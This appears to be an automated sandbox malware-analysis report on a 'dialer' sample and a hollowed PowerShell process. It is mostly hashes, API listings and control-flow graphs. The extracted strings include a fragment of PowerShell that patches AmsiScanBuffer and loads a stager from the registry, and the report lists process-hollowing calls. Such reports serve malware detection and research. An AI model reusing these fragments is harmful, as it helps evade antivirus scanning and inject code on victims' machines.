                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Heap$AddressAllocHandleModuleProcProcess
                                                          • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                          • API String ID: 3242894177-3709903795
                                                          • Opcode ID: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction ID: 14a767466f4e457cf388ac16d0af6f49bf344e7045f9ae0e12022511aa144a10
                                                          • Opcode Fuzzy Hash: b1fc34ca39e6db4a99ca0f74ce53aae3f3c4af68fd0d05a2b9d2c7ccdd3fe5d3
                                                          • Instruction Fuzzy Hash: 38416BF8284702A1FA1BEF17B8557D52365A78DBC5F846261BE0A473B69EBCC108C394
                                                          Function 000000014000117C Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 281memorycomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                          • String ID: SYSTEM$dialersvc64$powershell
                                                          • API String ID: 3960698109-174983134
                                                          • Opcode ID: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction ID: aee36af91c86c83140a7f8fc7c4422115872d8a4c3e6ef38ff6a7da2a4766896
                                                          • Opcode Fuzzy Hash: a180f732da29d2ef05bbba4c41d26df64929768de65ad4ca02d5ced4f3cbd646
                                                          • Instruction Fuzzy Hash: 2DD1DE76604B8586EB11CF6AE8843DE67B1FB88B99F508116EF4E47B68DF39C149C700
                                                          Function 00000001400017EC Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                          • String ID:
                                                          • API String ID: 4184240511-0
                                                          • Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
                                                          • Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
                                                          • Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300
                                                          Function 0000000140001C0C Relevance: 3.8, APIs: 3, Instructions: 40stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 168 140001c0c-140001c47 lstrlenW call 140001070 171 140001c49-140001c58 StrStrIW 168->171 172 140001c7c-140001c99 168->172 171->172 173 140001c5a 171->173 174 140001c5d-140001c7a StrStrIW 173->174 174->172 174->174
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID:
                                                          • API String ID: 1659193697-0
                                                          • Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
                                                          • Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
                                                          • Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740
                                                          Function 0000000140001970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 175 140001970-14000197b call 140001984 ExitProcess
                                                          APIs
                                                            • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
                                                            • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
                                                            • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
                                                            • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
                                                            • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
                                                            • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
                                                          • ExitProcess.KERNEL32 ref: 000000014000197B
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                          • String ID:
                                                          • API String ID: 3836967525-0
                                                          • Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
                                                          • Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
                                                          • Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

                                                          Non-executed Functions

                                                          Function 000000014000114C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 187 14000114c-140001165 GetModuleHandleA 188 140001174-140001178 187->188 189 140001167-14000116e GetProcAddress 187->189 189->188
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001A.00000002.2168860811.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 0000001A.00000002.2168838755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000001A.00000002.2168896814.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_26_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: RtlGetVersion$ntdll.dll
                                                          • API String ID: 1646373207-1489217083
                                                          • Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
                                                          • Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
                                                          • Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700

                                                          Execution Graph

                                                          Execution Coverage:9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:44.4%
                                                          Total number of Nodes:27
                                                          Total number of Limit Nodes:0

                                                          Executed Functions

                                                          Function 00007FFD34740001 Relevance: 3.4, Instructions: 3385COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2261622068.00007FFD34740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34740000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34740000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d517ab40b939059bbbf0a29a204777735a57863b412b51e827f736b69f00e19
                                                          • Instruction ID: dfdb07436d692e8bac719e4c970f57c2ba7daf5ca4ab364bd8ed70c413f667ac
                                                          • Opcode Fuzzy Hash: 6d517ab40b939059bbbf0a29a204777735a57863b412b51e827f736b69f00e19
                                                          • Instruction Fuzzy Hash: 2033A571A1CB858FE7759B1888956B977E0EF9A740F4505BED48CC7292CA38BC40CBC6
                                                          Function 00007FFD3467B3FB Relevance: 1.8, Strings: 1, Instructions: 535COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1026 7ffd3467b3fb-7ffd3467b440 1031 7ffd3467b442-7ffd3467b449 1026->1031 1032 7ffd3467b485-7ffd3467b493 1026->1032 1035 7ffd3467b3db-7ffd3467b3e9 1031->1035 1036 7ffd3467b44b-7ffd3467b450 1031->1036 1037 7ffd3467b495-7ffd3467b4c9 1032->1037 1043 7ffd3467b37e-7ffd3467b3d9 1035->1043 1044 7ffd3467b3eb-7ffd3467b3f9 1035->1044 1036->1037 1038 7ffd3467b452-7ffd3467b469 1036->1038 1049 7ffd3467b46a-7ffd3467b480 1038->1049 1043->1035 1067 7ffd3467b36b-7ffd3467b37d 1043->1067 1053 7ffd3467b482-7ffd3467b483 1049->1053 1054 7ffd3467b4ca-7ffd3467b4d9 1049->1054 1053->1032 1054->1049 1058 7ffd3467b4db-7ffd3467b54f 1054->1058 1061 7ffd3467b551-7ffd3467b565 1058->1061 1062 7ffd3467b567-7ffd3467b56e 1058->1062 1061->1062 1065 7ffd3467b581-7ffd3467b5a8 1062->1065 1066 7ffd3467b570-7ffd3467b573 1062->1066 1072 7ffd3467b62f-7ffd3467b636 1065->1072 1073 7ffd3467b5ae-7ffd3467b5b9 1065->1073 1066->1065 1069 7ffd3467b575-7ffd3467b57f 1066->1069 1067->1043 1069->1065 1074 7ffd3467b64e-7ffd3467b674 1072->1074 1075 7ffd3467b638-7ffd3467b64c 1072->1075 1073->1072 1076 7ffd3467b5bb-7ffd3467b5d3 1073->1076 1082 7ffd3467b72f-7ffd3467b79d 1074->1082 1083 7ffd3467b67a-7ffd3467b6f3 1074->1083 1075->1074 1078 7ffd3467b629-7ffd3467b62d 1076->1078 1079 7ffd3467b5d5-7ffd3467b61b 1076->1079 1078->1072 1078->1076 1087 7ffd3467b621-7ffd3467b625 1079->1087 1088 7ffd3467b6a0-7ffd3467b6a3 1079->1088 1106 7ffd3467b7a0-7ffd3467b7da 1082->1106 1095 7ffd3467b706-7ffd3467b729 call 7ffd3467b862 1083->1095 1096 7ffd3467b6f5-7ffd3467b701 call 7ffd3467b862 1083->1096 1087->1078 1091 7ffd3467b6b0-7ffd3467b6bd 1088->1091 1092 7ffd3467b6a5-7ffd3467b6a9 1088->1092 1092->1091 1095->1082 1095->1083 1103 7ffd3467b853-7ffd3467b861 1096->1103 1109 7ffd3467b7e1-7ffd3467b82d 1106->1109 1112 7ffd3467b82f-7ffd3467b83b call 7ffd3467b8ba 1109->1112 1113 7ffd3467b83d-7ffd3467b84e call 7ffd3467b8ba 1109->1113 1112->1103 1113->1106
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: mM_L
                                                          • API String ID: 0-3523453553
                                                          • Opcode ID: 9a6a835f63570ead54fce95d7cb578753af74ef42b508abae94303ddb585f4dd
                                                          • Instruction ID: 31c465cf4c07d16e9ee17119de4c26425679cef21ba03b22fe34dccf0407d440
                                                          • Opcode Fuzzy Hash: 9a6a835f63570ead54fce95d7cb578753af74ef42b508abae94303ddb585f4dd
                                                          • Instruction Fuzzy Hash: 6A02F531B0CA5A8FEB54DF5CC8A5AED7BE1FF69314F14417AD509D7286CA28E842C780
                                                          Function 00007FFD34680C6D Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1186 7ffd34680c6d-7ffd34680c79 1187 7ffd34680c84-7ffd34680cf8 1186->1187 1188 7ffd34680c7b-7ffd34680c83 1186->1188 1192 7ffd34680d02-7ffd34680d45 NtWriteVirtualMemory 1187->1192 1193 7ffd34680cfa-7ffd34680cff 1187->1193 1188->1187 1194 7ffd34680d4d-7ffd34680d6a 1192->1194 1195 7ffd34680d47 1192->1195 1193->1192 1195->1194
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 861368fcfc4aec83aa9b47dc101f0fd96d64a8d07ea3894c6622788441cead0e
                                                          • Instruction ID: 1960a880ea049957a80a0c469d4bffa5f0913bf3569c1de31a12ae2b4a953fb6
                                                          • Opcode Fuzzy Hash: 861368fcfc4aec83aa9b47dc101f0fd96d64a8d07ea3894c6622788441cead0e
                                                          • Instruction Fuzzy Hash: 2831E23190CB488FDB59DF58D885AE9BBE0FB5A321F00426ED049D3652CB74A806CB85
                                                          Function 00007FFD3467E0EA Relevance: 1.6, APIs: 1, Instructions: 120nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1196 7ffd3467e0ea-7ffd34680cf8 1200 7ffd34680d02-7ffd34680d45 NtWriteVirtualMemory 1196->1200 1201 7ffd34680cfa-7ffd34680cff 1196->1201 1202 7ffd34680d4d-7ffd34680d6a 1200->1202 1203 7ffd34680d47 1200->1203 1201->1200 1203->1202
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: dfa0f861bf1b0ea4a12715f0b9a2ce26a12fa36607aab4f61ca9496cb325c9c6
                                                          • Instruction ID: a91e9006856233f8efbbdb80e970b2554b6c778cf5206ea43512bc915f139a32
                                                          • Opcode Fuzzy Hash: dfa0f861bf1b0ea4a12715f0b9a2ce26a12fa36607aab4f61ca9496cb325c9c6
                                                          • Instruction Fuzzy Hash: 1B31A071A0CB1C9FDB58DF98D8856F9BBE0FB69311F00422ED04AD3652CB74A8068B85
                                                          Function 00007FFD34680A4E Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1204 7ffd34680a4e-7ffd34680a5b 1205 7ffd34680a5d-7ffd34680a65 1204->1205 1206 7ffd34680a66-7ffd34680b18 NtUnmapViewOfSection 1204->1206 1205->1206 1211 7ffd34680b20-7ffd34680b3c 1206->1211 1212 7ffd34680b1a 1206->1212 1212->1211
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 94722fea928e97a0844e204931684db1ad3c943f90feba322511e32f25836497
                                                          • Instruction ID: 6082548e50ffa38c5b4cac0da0f85d52ef39a61530c004b2d99118c84910319f
                                                          • Opcode Fuzzy Hash: 94722fea928e97a0844e204931684db1ad3c943f90feba322511e32f25836497
                                                          • Instruction Fuzzy Hash: C431073090C7888FDB5ADFA8C8967E97FE0EF67320F04429BD049C71A3D664A445CB91
                                                          Function 00007FFD3467E098 Relevance: 1.6, APIs: 1, Instructions: 117nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1213 7ffd3467e098-7ffd3467e0b6
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 3c65de9aa035ee31f62e58bfd0d063e6e746999df4ac0fdd62bcbf51f4f8653f
                                                          • Instruction ID: bd3fc71ebc2c4dca19603fcf531076dec41693e71d685d9419a3cb52e97348e7
                                                          • Opcode Fuzzy Hash: 3c65de9aa035ee31f62e58bfd0d063e6e746999df4ac0fdd62bcbf51f4f8653f
                                                          • Instruction Fuzzy Hash: 79313671A0CB488FEB58DF98C8897E97BF0EBA6320F04416FD049D3553DA64A849C751
                                                          Function 00007FFD34680FF4 Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1217 7ffd34680ff4-7ffd34680ffb 1218 7ffd34680ffd-7ffd34681005 1217->1218 1219 7ffd34681006-7ffd346810b2 NtResumeThread 1217->1219 1218->1219 1223 7ffd346810b4 1219->1223 1224 7ffd346810ba-7ffd346810d6 1219->1224 1223->1224
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: f1e97f7b45ef034c09f85d038cbe2fb3b6e699864bdc73d67839a15690050046
                                                          • Instruction ID: 79674d755005100ed7b89c85c1e6651f54cace71cce5ca45edfa3ede9483b2e0
                                                          • Opcode Fuzzy Hash: f1e97f7b45ef034c09f85d038cbe2fb3b6e699864bdc73d67839a15690050046
                                                          • Instruction Fuzzy Hash: 5A31F431A0C65C8FDB59DF98D8467EABBE1EF5A320F04416BD049D3252DB74A806CB91
                                                          Function 00007FFD3467E0B8 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1225 7ffd3467e0b8-7ffd34680b18 NtUnmapViewOfSection 1230 7ffd34680b20-7ffd34680b3c 1225->1230 1231 7ffd34680b1a 1225->1231 1231->1230
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: af61034d8793201e925e78473d94bd07670baab1a45d0e7138afb5ea27387d60
                                                          • Instruction ID: 439afea5c3cd4cffa23e9a96d8a4cb6576c3533a0a1a978e57600a3e654008f1
                                                          • Opcode Fuzzy Hash: af61034d8793201e925e78473d94bd07670baab1a45d0e7138afb5ea27387d60
                                                          • Instruction Fuzzy Hash: 8C21B671A0CA0C8FDB58DF98D8857F97BE0EB69320F04416FD04DD3252DA74A856CB51
                                                          Function 00007FFD34680F30 Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1232 7ffd34680f30-7ffd34680fc8 NtSetContextThread 1236 7ffd34680fd0-7ffd34680fec 1232->1236 1237 7ffd34680fca 1232->1237 1237->1236
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: b488fa0ea644253638193194de9da4f46eeca20c1a2fcd1f54208149b990dfe2
                                                          • Instruction ID: 8b1639de312b141d1ae4f1d926ad0f314f24c8e564699e54f3e0eec0f4166bc1
                                                          • Opcode Fuzzy Hash: b488fa0ea644253638193194de9da4f46eeca20c1a2fcd1f54208149b990dfe2
                                                          • Instruction Fuzzy Hash: 9B219131A0CA4C8FDB59DF98D84A7E97BF0EB66320F04416BD049D3252D674A846CB91
                                                          Function 00007FFD3467E12C Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1238 7ffd3467e12c-7ffd346810b2 NtResumeThread 1242 7ffd346810b4 1238->1242 1243 7ffd346810ba-7ffd346810d6 1238->1243 1242->1243
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 26ef37c90c8cb01699e229e827d36436f66690a8bcf36b582f72429c475cceae
                                                          • Instruction ID: 0bdbaa6e1c92d6fb07f8ab5b7747a3125f60cca8a86ad08ec38160b4996c61bb
                                                          • Opcode Fuzzy Hash: 26ef37c90c8cb01699e229e827d36436f66690a8bcf36b582f72429c475cceae
                                                          • Instruction Fuzzy Hash: 6B219171A0CA1C8FDB58DF98D8457EABBF1EB59310F04416ED00DD3256DB70A842CB91
                                                          Function 00007FFD3467E11C Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 8268f9dd3394697c15827971b597fef8cd9b265da5664a4e1eee7bf8ea6abeb4
                                                          • Instruction ID: d83033160141db32e38fff2f5496a5d5aea43bb1d381ed2e8410f0a0f5c1052f
                                                          • Opcode Fuzzy Hash: 8268f9dd3394697c15827971b597fef8cd9b265da5664a4e1eee7bf8ea6abeb4
                                                          • Instruction Fuzzy Hash: 19218130A0CA0C8FEB58DF98D84A7F97BF5EB69321F00416ED44DD3256DA70A846CB91
                                                          Function 00007FFD3467E10C Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 8268f9dd3394697c15827971b597fef8cd9b265da5664a4e1eee7bf8ea6abeb4
                                                          • Instruction ID: d83033160141db32e38fff2f5496a5d5aea43bb1d381ed2e8410f0a0f5c1052f
                                                          • Opcode Fuzzy Hash: 8268f9dd3394697c15827971b597fef8cd9b265da5664a4e1eee7bf8ea6abeb4
                                                          • Instruction Fuzzy Hash: 19218130A0CA0C8FEB58DF98D84A7F97BF5EB69321F00416ED44DD3256DA70A846CB91
                                                          Function 00007FFD3467DD68 Relevance: .3, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 727da290f0eaa9720a594c95c0ed1ffdbec7479d6f173d0d99ba9183fcd1b28b
                                                          • Instruction ID: 44603fa51e3cc90505afce4506104f76bec04ff21f21c4953cc7cfef4e82c71e
                                                          • Opcode Fuzzy Hash: 727da290f0eaa9720a594c95c0ed1ffdbec7479d6f173d0d99ba9183fcd1b28b
                                                          • Instruction Fuzzy Hash: D071F731B1CA1D4AF71CAB6898A62FD76D2EF99311F40853DE54FC31D3ED2CA8065282
                                                          Function 00007FFD3467E339 Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.2260307649.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd34670000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adc89536e25868ac0c62e61d4839ab039f0e4271579b5f7ccb32768caf8a1713
                                                          • Instruction ID: daa52249d2ce6761a29ac41e71bb626b9cd5b2c10c6da441f40c22490ff0ccdc
                                                          • Opcode Fuzzy Hash: adc89536e25868ac0c62e61d4839ab039f0e4271579b5f7ccb32768caf8a1713
                                                          • Instruction Fuzzy Hash: EA610931B1C6194AF758AB3498A62FE7BD2EF8A311F41853ED54FC31D3ED2D68065242
